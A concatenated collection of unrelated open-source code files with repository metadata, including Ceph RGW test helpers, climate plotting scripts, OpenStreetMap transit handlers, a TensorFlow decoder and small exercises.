error = e.output + " " + str(e.returncode)
print(error)
return False, error
def get_md5(fname):
log.info('fname: %s' % fname)
return hashlib.md5(open(fname, 'rb').read()).hexdigest()
# return "@424242"
def get_file_size(min, max):
size = lambda x: x if x % 5 == 0 else size(randint(min, max))
return size(randint(min, max))
def create_file(fname, size):
# give the size in mega bytes.
file_size = 1024 * 1024 * size
with open(fname, 'wb') as f:
f.truncate(file_size)
fname_with_path = os.path.abspath(fname)
# md5 = get_md5(fname)
return fname_with_path
def split_file(fname, size_to_split=5):
try:
split_cmd = "split" + " " + '-b' + str(size_to_split) + "m " + fname
subprocess.check_output(split_cmd, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
error = e.output + str(e.returncode)
log.error(error)
return False
class FileOps(object):
def __init__(self, filename, type):
self.type = type
self.fname = filename
def get_data(self):
data = None
with open(self.fname, 'r') as fp:
if self.type == 'json':
data = json.load(fp)
if self.type == 'txt' or self.type == 'ceph.conf' :
raw_data = fp.readlines()
tmp = lambda x: x.rstrip('\n')
data = map(tmp, raw_data)
if self.type == 'yaml':
data = yaml.load(fp)
fp.close()
return data
def add_data(self, data):
with open(self.fname, "w") as fp:
if self.type == 'json':
json.dump(data, fp, indent=4)
if self.type == 'txt':
fp.write(data)
if self.type == 'ceph.conf':
data.write(fp)
elif self.type is None:
data.write(fp)
elif self.type == 'yaml':
yaml.dump(data, fp, default_flow_style=False)
fp.close()
class ConfigParse(object):
def __init__(self, fname):
self.fname = fname
self.cfg = ConfigParser.ConfigParser()
self.cfg.read(fname)
def set(self, section, option, value =None):
self.cfg.set(section, option, value)
return self.cfg
def add_section(self, section):
try:
self.cfg.add_section(section)
return self.cfg
except ConfigParser.DuplicateSectionError, e :
log.info('section already exists: %s' % e)
return self.cfg
def make_copy_of_file(f1, f2):
"""
copy f1 to f2 location
"""
cmd = 'sudo cp %s %s' % (f1, f2)
executed_status = exec_shell_cmd(cmd)
if not executed_status[0]:
return executed_status
else:
return os.path.abspath(f2)
class RGWService(object):
def __init__(self):
pass
def restart(self):
executed = exec_shell_cmd('sudo systemctl restart ceph-radosgw.target')
return executed[0]
def stop(self):
executed = exec_shell_cmd('sudo systemctl stop ceph-radosgw.target')
return executed[0]
def start(self):
executed = exec_shell_cmd('sudo systemctl stop ceph-radosgw.target')
return executed[0]
def get_radosgw_port_no():
op = exec_shell_cmd('sudo netstat -nltp | grep radosgw')
x = op[1].split(" ")
port = [i for i in x if ':' in i][0].split(':')[1]
log.info('radosgw is running in port: %s' % port)
return port
def get_all_in_dir(path):
all = []
for dirName, subdirList, fileList in os.walk(path):
print('%s' % dirName)
log.info('dir_name: %s' % dirName)
for fname in fileList:
log.info('filename: %s' % os.path.join(dirName,fname))
all.append( os.path.join(dirName,fname))
log.info('----------------')
return all
|
[
"rgowdege@redhat.com"
] |
rgowdege@redhat.com
|
4165714b6915a4d0588888e11735294fe601d2ab
|
899d17821348c0dad9ef98a25828df0edeabbccc
|
/b64_to_raw.py
|
e1459cd841c2391375212a47684a6e5030cd8045
|
[
"BSD-3-Clause"
] |
permissive
|
tstellanova/px4flow_bsp
|
35302ebf9a62a26c6e4cf66586e66f9b9a7b3285
|
751151cb0c826148013b0709e7a246a9d9ca774d
|
refs/heads/trunk
| 2022-12-18T11:57:50.922431
| 2020-09-30T23:11:38
| 2020-09-30T23:11:38
| 276,243,760
| 5
| 0
|
BSD-3-Clause
| 2020-09-16T16:32:16
| 2020-07-01T01:06:37
|
Rust
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
#!/usr/bin/env python
import base64
# this simple python script converts base64-encoded
# pixel values to raw binary values in order to create a RAW image file.
# This was used for verifying pixel transfer from the camera sensor
with open('sessions/out18.b64', 'r') as input:
data = input.read()
decoded = base64.b64decode(data)
with open('sessions/out18.raw', 'wb') as out:
out.write(decoded)
|
[
"tstellanova@users.noreply.github.com"
] |
tstellanova@users.noreply.github.com
|
0d69e287559d424fa5af284dac9aa10f43cfe0e6
|
ae48c2a1fa0c4776ec2cc79281cd3ebb9ade0c4d
|
/site/solutions/DMOJ/cco15p2.py
|
fd2d3a98ceb050b352540d4251cf518de9537edc
|
[] |
no_license
|
shunr/cbcs-docs
|
c9cac20de9624fcfaed7a753a28c91993909d830
|
42b065fa6f8d80c50ae9d724d8d777b2a41df7d6
|
refs/heads/master
| 2021-01-23T00:56:44.540801
| 2017-09-23T01:48:32
| 2017-09-23T01:48:32
| 92,857,947
| 1
| 2
| null | 2017-09-23T01:48:33
| 2017-05-30T17:19:43
|
HTML
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
import sys
from collections import defaultdict
input = sys.stdin.readline
n, m = (int(i) for i in input().split())
graph = defaultdict(list)
weights = {}
dp = [[0 for i in range(300000)] for j in range(18)]
for i in range(m):
a, b, c = (int(i) for i in input().split())
graph[b].append(a)
weights[(a,b)] = c
def meme(dp, G, w, s, x, path):
best = -999999
if x == s:
return 0
if dp[x][path] != 0:
return dp[x][path]
for n in G[x]:
if (path & (1 << n)) == 0:
best = max(meme(dp, G, w, s, n, (path | (1 << n))) + w[(n, x)], best)
dp[x][path] = best
return dp[x][path]
print(meme(dp, graph, weights, 0, n-1, 0 | (1 << n-1)))
|
[
"shunyu.rao@gmail.com"
] |
shunyu.rao@gmail.com
|
e0f7c9c4ff181962b241cec1ff3ce7014bc8570c
|
b04aa637ae8a53276eed9f4d40b17f41101d9c7f
|
/Scripts/plot_ProfileVar_Monthly_100yrPeriods.py
|
02d599d64023bc68467e98c53064020719153a4e
|
[
"MIT"
] |
permissive
|
zmlabe/StratoVari
|
a442adef7eef3a4ade0fa87e5d49ac382287307f
|
c5549f54482a2b05e89bded3e3b0b3c9faa686f3
|
refs/heads/master
| 2021-06-18T06:21:04.291186
| 2021-04-01T16:37:24
| 2021-04-01T16:37:24
| 193,129,384
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,727
|
py
|
"""
Plot vertical plots of PAMIP data for each month from November to April using
the ensemble mean (300)
Notes
-----
Author : Zachary Labe
Date : 26 June 2019
"""
### Import modules
import numpy as np
import matplotlib.pyplot as plt
import datetime
import read_MonthlyData as MO
import calc_Utilities as UT
import cmocean
import itertools
### Define directories
directorydata = '/seley/zlabe/simu/'
directoryfigure = '/home/zlabe/Desktop/STRATOVARI/'
#directoryfigure = '/home/zlabe/Documents/Research/SITperturb/Figures/'
### Define time
now = datetime.datetime.now()
currentmn = str(now.month)
currentdy = str(now.day)
currentyr = str(now.year)
currenttime = currentmn + '_' + currentdy + '_' + currentyr
titletime = currentmn + '/' + currentdy + '/' + currentyr
print('\n' '----Plotting Monthly Vertical Profiles- %s----' % titletime)
### Alott time series (300 ensemble members)
year1 = 1701
year2 = 2000
years = np.arange(year1,year2+1,1)
###############################################################################
###############################################################################
###############################################################################
### Call arguments
varnames = ['U','GEOP','TEMP','V','EGR']
######################
def readDataPeriods(varnames,sliceq):
### Call function for 4d variable data
lat,lon,lev,varfuture = MO.readExperiAll(varnames,'Future','profile')
lat,lon,lev,varpast = MO.readExperiAll(varnames,'Current','profile')
### Select ensemble mean period
if sliceq == 'Mean':
varfuture = varfuture[:,:,:,:,:]
varpast = varpast[:,:,:,:,:]
elif sliceq == 'A':
varfuture = varfuture[:100,:,:,:,:]
varpast = varpast[:100,:,:,:,:]
elif sliceq == 'B':
varfuture = varfuture[100:200,:,:,:,:]
varpast = varpast[100:200,:,:,:,:]
elif sliceq == 'C':
varfuture = varfuture[200:,:,:,:,:]
varpast = varpast[200:,:,:,:,:]
### Create 2d array of latitude and longitude
lon2,lat2 = np.meshgrid(lon,lat)
### Remove missing data
varfuture[np.where(varfuture <= -1e10)] = np.nan
varpast[np.where(varpast <= -1e10)] = np.nan
### Rearrange months (N,D,J,F,M,A)
varfuturem = np.append(varfuture[:,-2:,:,:,:],varfuture[:,:4,:,:,:],
axis=1)
varpastm = np.append(varpast[:,-2:,:,:,:],varpast[:,:4,:,:,:],axis=1)
### Calculate zonal means
varfuturemz = np.nanmean(varfuturem,axis=4)
varpastmz = np.nanmean(varpastm,axis=4)
### Calculate anomalies
anompi = varfuturemz - varpastmz
### Calculate ensemble mean
anompim = np.nanmean(anompi,axis=0)
zdiffruns = anompim
### Calculate climatologies
zclimo = np.nanmean(varpastmz,axis=0)
### Calculate significance for each month
stat_past = np.empty((varpastmz.shape[1],len(lev),len(lat)))
pvalue_past= np.empty((varpastmz.shape[1],len(lev),len(lat)))
for i in range(varpastmz.shape[1]):
stat_past[i],pvalue_past[i] = UT.calc_indttest(varfuturemz[:,i,:,:],
varpastmz[:,i,:,:])
pruns = pvalue_past
return zdiffruns,zclimo,pruns,lat,lon,lev
###########################################################################
###########################################################################
###########################################################################
### Read in data
for v in range(len(varnames)):
diffm,climom,pvalm,lat,lon,lev = readDataPeriods(varnames[v],'Mean')
diffa,climoa,pvala,lat,lon,lev = readDataPeriods(varnames[v],'A')
diffb,climob,pvalb,lat,lon,lev = readDataPeriods(varnames[v],'B')
diffc,climoc,pvalc,lat,lon,lev = readDataPeriods(varnames[v],'C')
zdiffruns = list(itertools.chain(*[diffm,diffa,diffb,diffc]))
zclimo = list(itertools.chain(*[climom,climoa,climob,climoc]))
pruns = list(itertools.chain(*[pvalm,pvala,pvalb,pvalc]))
### Plot Variables
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
### Set limits for contours and colorbars
if varnames[v] == 'U':
limit = np.arange(-2,2.1,0.1)
barlim = np.arange(-2,3,1)
elif varnames[v] == 'TEMP':
limit = np.arange(-4,4.1,0.2)
barlim = np.arange(-4,5,1)
elif varnames[v] == 'GEOP':
limit = np.arange(-60,61,2)
barlim = np.arange(-60,61,30)
elif varnames[v] == 'V':
limit = np.arange(-0.2,0.21,0.02)
barlim = np.arange(-0.2,0.3,0.1)
elif varnames[v] == 'EGR':
limit = np.arange(-0.08,0.081,0.005)
barlim = np.arange(-0.08,0.09,0.04)
zscale = np.array([1000,700,500,300,200,
100,50,30,10])
latq,levq = np.meshgrid(lat,lev)
fig = plt.figure()
for i in range(len(zdiffruns)):
ax1 = plt.subplot(4,6,i+1)
ax1.spines['top'].set_color('dimgrey')
ax1.spines['right'].set_color('dimgrey')
ax1.spines['bottom'].set_color('dimgrey')
ax1.spines['left'].set_color('dimgrey')
ax1.spines['left'].set_linewidth(2)
ax1.spines['bottom'].set_linewidth(2)
ax1.spines['right'].set_linewidth(2)
ax1.spines['top'].set_linewidth(2)
ax1.tick_params(axis='y',direction='out',which='major',pad=3,
width=2,color='dimgrey')
ax1.tick_params(axis='x',direction='out',which='major',pad=3,
width=2,color='dimgrey')
cs = plt.contourf(lat,lev,zdiffruns[i],limit,extend='both')
if varnames[v] == 'U':
cs2 = plt.contour(lat,lev,zclimo[i],np.arange(-20,101,5),
linewidths=0.5,colors='dimgrey')
plt.contourf(latq,levq,pruns[i],colors='None',hatches=['//////'],
linewidth=5)
plt.gca().invert_yaxis()
plt.yscale('log',nonposy='clip')
plt.xticks(np.arange(0,96,30),map(str,np.arange(0,91,30)),fontsize=5)
plt.yticks(zscale,map(str,zscale),ha='right',fontsize=5)
plt.minorticks_off()
plt.xlim([0,90])
plt.ylim([1000,10])
if any([i==0,i==6,i==12,i==18]):
ax1.tick_params(labelleft='on')
else:
ax1.tick_params(labelleft='off')
if i < 18:
ax1.tick_params(labelbottom='off')
if any([i==0,i==6,i==12]):
ax1.tick_params(axis='y',direction='out',which='major',pad=3,
width=2,color='dimgrey')
ax1.tick_params(axis='x',direction='out',which='major',pad=3,
width=0,color='dimgrey')
else:
if i < 24 and i != 18:
ax1.tick_params(axis='y',direction='out',which='major',pad=3,
width=0,color='dimgrey')
if i < 18:
ax1.tick_params(axis='y',direction='out',which='major',
pad=3,width=0,color='dimgrey')
ax1.tick_params(axis='x',direction='out',which='major',
pad=3,width=0,color='dimgrey')
if varnames[v] == 'U':
cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'TEMP':
cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'GEOP':
cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'V':
cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'EGR':
cmap = cmocean.cm.diff
cs.set_cmap(cmap)
labelmonths = [r'NOV',r'DEC',r'JAN',r'FEB',r'MAR',r'APR']
if i < 6:
ax1.annotate(r'\textbf{%s}' % labelmonths[i],
xy=(0, 0),xytext=(0.5,1.13),xycoords='axes fraction',
fontsize=13,color='dimgrey',rotation=0,
ha='center',va='center')
if i==0:
plt.annotate(r'\textbf{Mean}',
xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
fontsize=15,color='k',rotation=90,
ha='center',va='center')
elif i==6:
plt.annotate(r'\textbf{A}',
xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
fontsize=15,color='k',rotation=90,
ha='center',va='center')
elif i==12:
plt.annotate(r'\textbf{B}',
xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
fontsize=15,color='k',rotation=90,
ha='center',va='center')
elif i==18:
plt.annotate(r'\textbf{C}',
xy=(0, 0),xytext=(-0.6,0.5),xycoords='axes fraction',
fontsize=15,color='k',rotation=90,
ha='center',va='center')
cbar_ax = fig.add_axes([0.312,0.07,0.4,0.02])
cbar = fig.colorbar(cs,cax=cbar_ax,orientation='horizontal',
extend='both',extendfrac=0.07,drawedges=False)
if varnames[v] == 'U':
cbar.set_label(r'\textbf{m/s}',fontsize=9,color='dimgray',
labelpad=0)
elif varnames[v] == 'TEMP':
cbar.set_label(r'\textbf{$^\circ$C}',fontsize=9,color='dimgray',
labelpad=0)
elif varnames[v] == 'GEOP':
cbar.set_label(r'\textbf{m}',fontsize=9,color='dimgray',
labelpad=0)
elif varnames[v] == 'V':
cbar.set_label(r'\textbf{m/s}',fontsize=9,color='dimgray',
labelpad=0)
elif varnames[v] == 'EGR':
cbar.set_label(r'\textbf{1/day}',fontsize=9,color='dimgray',
labelpad=0)
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.ax.tick_params(axis='x', size=.01)
cbar.outline.set_edgecolor('dimgrey')
cbar.outline.set_linewidth(0.5)
cbar.ax.tick_params(labelsize=6)
plt.annotate(r'\textbf{Latitude ($^{\circ}$N)',
xy=(0, 0),xytext=(0.515,0.12),xycoords='figure fraction',
fontsize=6,color='k',rotation=0,
ha='center',va='center')
plt.subplots_adjust(hspace=0.1,bottom=0.17,top=0.93,wspace=0.1)
plt.savefig(directoryfigure + '%s_MonthlyProfiles_100yr.png' % varnames[v],
dpi=300)
print('Completed: Script done!')
|
[
"zlabe@uci.edu"
] |
zlabe@uci.edu
|
4063bad361a03430b9a15ee1a4e4821c7c13571b
|
6126167b27ebde0f967b275f9910ba6df0c136b3
|
/Bulk_Data/Model38/model38_fit.py
|
6a0b47a4193e3667cef98440a727c2f747844172
|
[] |
no_license
|
giannamars/Effective-Soil-Biogeochemial-Modeling
|
e8651edfbee42a05199ffe64c2155c4c085095a4
|
e1b81639b8d6ce6f5f869b04d93bcbada8d0f96f
|
refs/heads/master
| 2020-04-05T11:53:11.235389
| 2019-06-14T00:53:20
| 2019-06-14T00:53:20
| 156,848,787
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,787
|
py
|
from SloppyCell.ReactionNetworks import *
import PECCAT_experiment
import numpy as np
import scipy
## Read model from SBML file
model_net = IO.from_SBML_file('PECCAT38.xml', 'base')
## define bulk measurements
model_net.add_species('cmic', 'compartmentOne')
model_net.add_assignment_rule('cmic', 'x_1 + x_2 + x_3')
#
model_net.add_species('doc', 'compartmentOne')
model_net.add_assignment_rule('doc', 'x_6 + x_8')
#
model_net.add_species('toc', 'compartmentOne')
model_net.add_assignment_rule('toc', 'x_1 + x_2 + x_3 + x_6 + x_7 + x_8 + x_9')
## Add inital activity fractions to parameters
model_net.add_parameter('rB0', 0.1)
model_net.add_parameter('rF0', 0.1)
#
model_net.set_var_ic('x_4', 'rB0')
model_net.set_var_ic('x_5', 'rF0')
#
model_net.add_assignment_rule('x_4', ' Phi21*x_8')
#
model_net.add_species('co2_tot', 'compartmentOne')
model_net.add_assignment_rule('co2_tot', 'x_10 + x_11*(1-YLHiq*(((cL + (t/(t**2 + bL))**3) - cL)/(cL + (1/2*sqrt(bL))**3)) - YLLoq*(1-(((cL + (t/(t**2 + bL))**3) - cL)/(cL + (1/2*sqrt(bL))**3))))*(cL + (t/(t**2 + bL))**3)')
## Don't optimize MCPA sorption kinetics and soil properties
model_net.set_var_optimizable('Kf', False)
model_net.set_var_optimizable('nf', False)
model_net.set_var_optimizable('nc', False)
model_net.set_var_optimizable('theta', False)
model_net.set_var_optimizable('rhoB', False)
model_net.set_var_optimizable('cL', False)
model_net.set_var_optimizable('bL', False)
model_net.set_var_optimizable('YLHiq', True)
model_net.set_var_optimizable('YLLoq', True)
## Output latex'ed equations for debugging
IO.eqns_TeX_file(model_net, 'model38.tex')
## Create the model
m = Model([PECCAT_experiment.expt], [model_net])
p0= m.get_params().copy()
p38 = Utility.load('p37.geodesics.bpkl')
#
p38 = np.delete(p38,2)
for i, (key,value) in enumerate(p0.items()):
p0[i] = p38[i]
## Set prior ranges from value/prior_range to value*prior_range
res = Residuals.PriorInLog('YLHiq_prior', 'YLHiq', np.log(p0[10]), np.log(np.sqrt(p0[10])))
m.AddResidual(res)
res = Residuals.PriorInLog('YLLoq_prior', 'YLLoq', np.log(p0[11]), np.log(np.sqrt(p0[11])))
m.AddResidual(res)
res = Residuals.PriorInLog('YrB_prior', 'YrB', np.log(p0[12]), np.log(np.sqrt(p0[12])))
m.AddResidual(res)
res = Residuals.PriorInLog('YrF_prior', 'YrF', np.log(p0[13]), np.log(np.sqrt(p0[13])))
m.AddResidual(res)
res = Residuals.PriorInLog('YRFP_prior', 'YRFP', np.log(p0[14]), np.log(np.sqrt(p0[14])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBHiq_prior', 'YsBHiq', np.log(p0[15]), np.log(np.sqrt(p0[15])))
m.AddResidual(res)#
res = Residuals.PriorInLog('YsBLoq_prior', 'YsBLoq', np.log(p0[16]), np.log(np.sqrt(p0[16])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPHiq_prior', 'YsBPHiq', np.log(p0[17]), np.log(np.sqrt(p0[17])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPLoq_prior', 'YsBPLoq', np.log(p0[18]), np.log(np.sqrt(p0[18])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsBPP_prior', 'YsBPP', np.log(p0[19]), np.log(np.sqrt(p0[19])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsFHiq_prior', 'YsFHiq', np.log(p0[20]), np.log(np.sqrt(p0[20])))
m.AddResidual(res)
res = Residuals.PriorInLog('YsFLoq_prior', 'YsFLoq', np.log(p0[21]), np.log(np.sqrt(p0[21])))
m.AddResidual(res)
res = Residuals.PriorInLog('rB0_prior', 'rB0', np.log(p0[22]), np.log(np.sqrt(p0[22])))
m.AddResidual(res)
res = Residuals.PriorInLog('rF0_prior', 'rF0', np.log(p0[23]), np.log(np.sqrt(p0[23])))
m.AddResidual(res)
## Optimize to fit data
print 'Initial Cost:', m.cost(p0)
popt = Optimization.fmin_lm_log_params(m, p0, maxiter=10, disp=True)
# Then we run Levenberg-Marquardt
#popt = Optimization.leastsq_log_params(m, popt1)
cost_opt = m.cost(popt)
print(popt)
print 'Optimized Cost:', m.cost(popt)
Utility.save(popt, 'popt38.model.bpkl')
|
[
"noreply@github.com"
] |
giannamars.noreply@github.com
|
da5f19cab45a1557ca472a71e56dff461cc74bb2
|
335e342ee2b1f3518adbe3db2c102dab9c78fe54
|
/test_grasshopper.py
|
00695a63522ad2cc9f69592af12b69faf99c6935
|
[
"MIT"
] |
permissive
|
akarnoski/code-katas
|
070d877a196e82655ed385a447b64d3f49e9ec52
|
c90c51780174110d6292b57248b77723db6ad6ac
|
refs/heads/master
| 2021-09-03T05:22:11.298649
| 2018-01-05T23:24:01
| 2018-01-05T23:24:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
"""Test the damage function."""
import pytest
def test_combat():
"""test the nth_even function."""
from grasshopper import combat
test_value = combat(100, 5)
assert test_value == 95
|
[
"adrienne.j.karnoski@gmail.com"
] |
adrienne.j.karnoski@gmail.com
|
bdad9e2df78fc3a6cd7db2113cebb1c2f1d82c73
|
161e10d2d45e32b4066ef3c76dbb473a6b967191
|
/realtors/models.py
|
3934a4cc5a393d429f275b7de5ab1dfa216c1e61
|
[] |
no_license
|
ben-muhindi/Real-Estate
|
0603544c1b8ec365464da02d9cb65ba3d7be1993
|
3232023fbc9b549148d1be4f5a369342bc2ed9bf
|
refs/heads/master
| 2023-03-12T14:06:43.619336
| 2021-03-05T07:55:09
| 2021-03-05T07:55:09
| 287,584,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
from django.db import models
from datetime import datetime
class Realtor(models.Model):
name=models.CharField(max_length=200)
photo =models.ImageField(upload_to='photos/%Y/%m/%d/')
description=models.TextField(blank=True)
phone=models.CharField(max_length=200)
email=models.CharField(max_length=50)
is_mvp =models.BooleanField(default=False)
hire_date =models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.name
|
[
"skyriters@gmail.com"
] |
skyriters@gmail.com
|
4da065e4715df88040221f0545d1cada489aae59
|
8fd5dadf6545ab7ea69ec1d36f0b84baaa340563
|
/Model/decoder.py
|
619726eee0d3052b3cc15bdfe51d71db7bdbddd0
|
[] |
no_license
|
MistQue/Adversarial-Autoencoder
|
45b386e2984500e990a5ed4295f7bcbffb089354
|
a66cd030e7169d31a8742ca20cac444b19c8e83a
|
refs/heads/master
| 2021-01-19T07:18:10.524417
| 2017-06-04T00:04:11
| 2017-06-04T00:04:11
| 87,534,766
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,102
|
py
|
import os
import sys
import numpy as np
import tensorflow as tf
from util import linear_layer, batch_norm, lrelu
class Decoder(object):
def __init__(self, layer_list):
self.layer_list = layer_list
self.name_scope = 'decoder'
def get_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name_scope)
def __call__(self, x, is_training, reuse):
h = x
with tf.variable_scope(self.name_scope, reuse=reuse):
for i, (in_dim, out_dim) in enumerate(zip(self.layer_list, self.layer_list[1:-1])):
h = linear_layer(h, in_dim, out_dim, i)
h = batch_norm(h, i, is_training=is_training)
h = lrelu(h)
h = linear_layer(h, self.layer_list[-2], self.layer_list[-1], 'output')
h = batch_norm(h, 'output', is_training=is_training)
ret = tf.nn.sigmoid(h)
return ret
if __name__ == '__main__':
dec = Decoder([2, 100, 600, 1200, 784])
z = tf.placeholder(tf.float32, [None, 2])
dec(z, True, False)
|
[
"krnpcs@hotmail.com"
] |
krnpcs@hotmail.com
|
20d1eaa3378722645077004bdb9aa04769ed0a65
|
bb589dd3c74a8ba92e8bf79ce6e5c44a739f2236
|
/Week2/gcd_iter.py
|
e638f80f97eb1cf806caf3874983723c628501e2
|
[] |
no_license
|
matyh/MITx_6.00.1x
|
e49dfe2eed4948ea109ce6382564a6bfcc0fae67
|
d98645e90bb3c5380523ea2316692879ac4dd280
|
refs/heads/master
| 2022-11-23T16:50:42.236950
| 2020-07-27T12:46:45
| 2020-07-27T12:46:45
| 230,529,326
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 278
|
py
|
def gcdIter(a, b):
"""
a, b: positive integers
returns: a positive integer, the greatest common divisor of a & b.
"""
for i in range(min(a, b), 0, -1):
if a % i == 0 and b % i == 0:
return i
print(gcdIter(17, 12))
print(gcdIter(9, 12))
|
[
"martin.hora11gmail.com"
] |
martin.hora11gmail.com
|
30b7aa92d5f6fb49fcd342a56d4100e11b24a88a
|
f1eeea3dbcf6d001028a36f332609339b1e86b78
|
/transit_to_gif_handlers.py
|
dd80bb3f4b0c85943b57e8b290e98ad2a3dcb344
|
[] |
no_license
|
Jungle-Bus/accra_transit_gif
|
f6762fd503a547cd0831c7799f31783320d9dbd8
|
95d5698a256f8594b5e3ff805d72a2603eed7ae2
|
refs/heads/master
| 2021-07-24T09:42:30.181886
| 2021-03-23T15:05:43
| 2021-03-23T15:05:43
| 108,272,294
| 0
| 1
| null | 2021-06-08T19:02:59
| 2017-10-25T13:13:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,330
|
py
|
# coding: utf-8
import osmium
import datetime
import shapely.wkb as wkblib
wkbfab = osmium.geom.WKBFactory()
class StopsHandler(osmium.SimpleHandler):
def __init__(self):
osmium.SimpleHandler.__init__(self)
self.start_date = datetime.datetime.strptime("01/07/2017", "%d/%m/%Y").replace(tzinfo=datetime.timezone.utc)
self.stops = {}
def node(self, n):
#on prend public_transport = platform et highway=bus_stop
if n.timestamp < self.start_date:
pass
elif ('public_transport' in n.tags and n.tags['public_transport'] == 'platform') and \
('highway' in n.tags and n.tags['highway'] == 'bus_stop') :
wkb = wkbfab.create_point(n.location)
point = wkblib.loads(wkb, hex=True)
name = ""
public_transport = ""
highway = ""
if "name" in n.tags:
name = n.tags["name"]
if "public_transport" in n.tags:
public_transport = n.tags["public_transport"]
if "highway" in n.tags:
highway = n.tags["highway"]
if not n.id in self.stops:
self.stops[n.id] = {}
self.stops[n.id]["version"] = []
self.stops[n.id]["date"] = []
self.stops[n.id]["name"] = []
self.stops[n.id]["lat"] = []
self.stops[n.id]["lon"] = []
self.stops[n.id]["geometry"] = []
self.stops[n.id]["version"].append(n.version)
self.stops[n.id]["date"].append(n.timestamp)
self.stops[n.id]["name"].append(name)
self.stops[n.id]["lat"].append(n.location.lat)
self.stops[n.id]["lon"].append(n.location.lon)
self.stops[n.id]["geometry"].append(point)
class RelationHandler(osmium.SimpleHandler):
def __init__(self):
osmium.SimpleHandler.__init__(self)
self.start_date = datetime.datetime.strptime("01/07/2017", "%d/%m/%Y").replace(tzinfo=datetime.timezone.utc)
self.routes = {}
def relation(self, r):
#on prend type=route et route=bus
if r.timestamp < self.start_date:
pass
elif ('type' in r.tags and r.tags['type'] == 'route') and ('route' in r.tags and r.tags['route'] == 'bus') :
name = ""
ref = ""
r_type = ""
route = ""
if "ref" in r.tags:
ref = r.tags["ref"]
if "name" in r.tags:
name = r.tags["name"]
ways = []
for rm in r.members:
if not rm.type == 'w': continue
ways.append(rm.ref)
if not r.id in self.routes:
self.routes[r.id] = {}
self.routes[r.id]["version"] = []
self.routes[r.id]["date"] = []
self.routes[r.id]["ref"] = []
self.routes[r.id]["name"] = []
self.routes[r.id]["ways"] = []
self.routes[r.id]["version"].append(r.version)
self.routes[r.id]["date"].append(r.timestamp)
self.routes[r.id]["ref"].append(ref)
self.routes[r.id]["name"].append(name)
#ways est un tableau qui contient, pour chaque version, un tableau de ways
self.routes[r.id]["ways"].append(ways)
class WayHandler(osmium.SimpleHandler):
def __init__(self, requested_ways):
osmium.SimpleHandler.__init__(self)
self.requested_ways = requested_ways
self.ways = {}
def way(self, w):
if w.id in self.requested_ways:
if not w.id in self.ways:
self.ways[w.id] = {}
self.ways[w.id]["object_id"] = w.id
self.ways[w.id]["version"] = ""
self.ways[w.id]["date"] = ""
self.ways[w.id]["nodes_ref"] = ""
if not self.ways[w.id]["version"] or self.ways[w.id]["version"] < w.version:
self.ways[w.id]["version"] = w.version
self.ways[w.id]["date"] = w.timestamp
self.ways[w.id]["nodes_ref"] = [n.ref for n in w.nodes]
class NodeHandler(osmium.SimpleHandler):
def __init__(self, requested_nodes):
osmium.SimpleHandler.__init__(self)
self.requested_nodes = requested_nodes
self.nodes = {}
def node(self, n):
if n.id in self.requested_nodes:
if not n.id in self.nodes:
self.nodes[n.id] = {}
self.nodes[n.id]["object_id"] = n.id
self.nodes[n.id]["version"] = ""
self.nodes[n.id]["lat"] = ""
self.nodes[n.id]["lon"] = ""
self.nodes[n.id]["valid"] = ""
if not self.nodes[n.id]["version"] or self.nodes[n.id]["version"] < n.version:
self.nodes[n.id]["version"] = n.version
try:
if n.location.valid:
self.nodes[n.id]["lat"] = n.location.lat
self.nodes[n.id]["lon"] = n.location.lon
else:
print("point invalide : {:d}".format(n.id))
except Exception as e:
print("exception sur le node {:d}".format(self.nodes[n.id]["object_id"]))
#raise
|
[
"pascal.rhod@canaltp.fr"
] |
pascal.rhod@canaltp.fr
|
a957cbb7dd30928e559ce8db5eff734935e055f5
|
68ec8d3140755c8b2d420f2bef660b75c6391cb2
|
/balance/urls.py
|
560c4485a8dd00b876f42de0de628252b028a52c
|
[] |
no_license
|
omfsakib/mealmanager
|
69fd569e95a56f322e6e8c59b9c4fc4d542a4876
|
cf2a3e317d3ad89407ac94928e947afbae7d27a2
|
refs/heads/main
| 2023-05-10T03:08:29.564272
| 2021-05-31T14:44:49
| 2021-05-31T14:44:49
| 365,000,104
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.urls import path
from balance.views import balance
from . import views
app_name = 'balance'
urlpatterns = [
path('',balance.as_view(),name='balance'),
]
|
[
"noreply@github.com"
] |
omfsakib.noreply@github.com
|
601cd6fe069e3927ca1d0a53cc388d309ad53182
|
f27522a329695fae74508b374186ba9081adb863
|
/ArtificialNeuralNetwork.py
|
669656ba1db1a960f59c733ceb6fcc5f4780ec12
|
[] |
no_license
|
kennethng555/DecisionTree
|
242a6b7469d5d2d5b8f4cf59ada3b64172979b14
|
69d2a67d2d7f09e3df3e70e8c972bcf6559f0848
|
refs/heads/main
| 2023-01-20T07:03:55.840814
| 2020-11-28T22:48:05
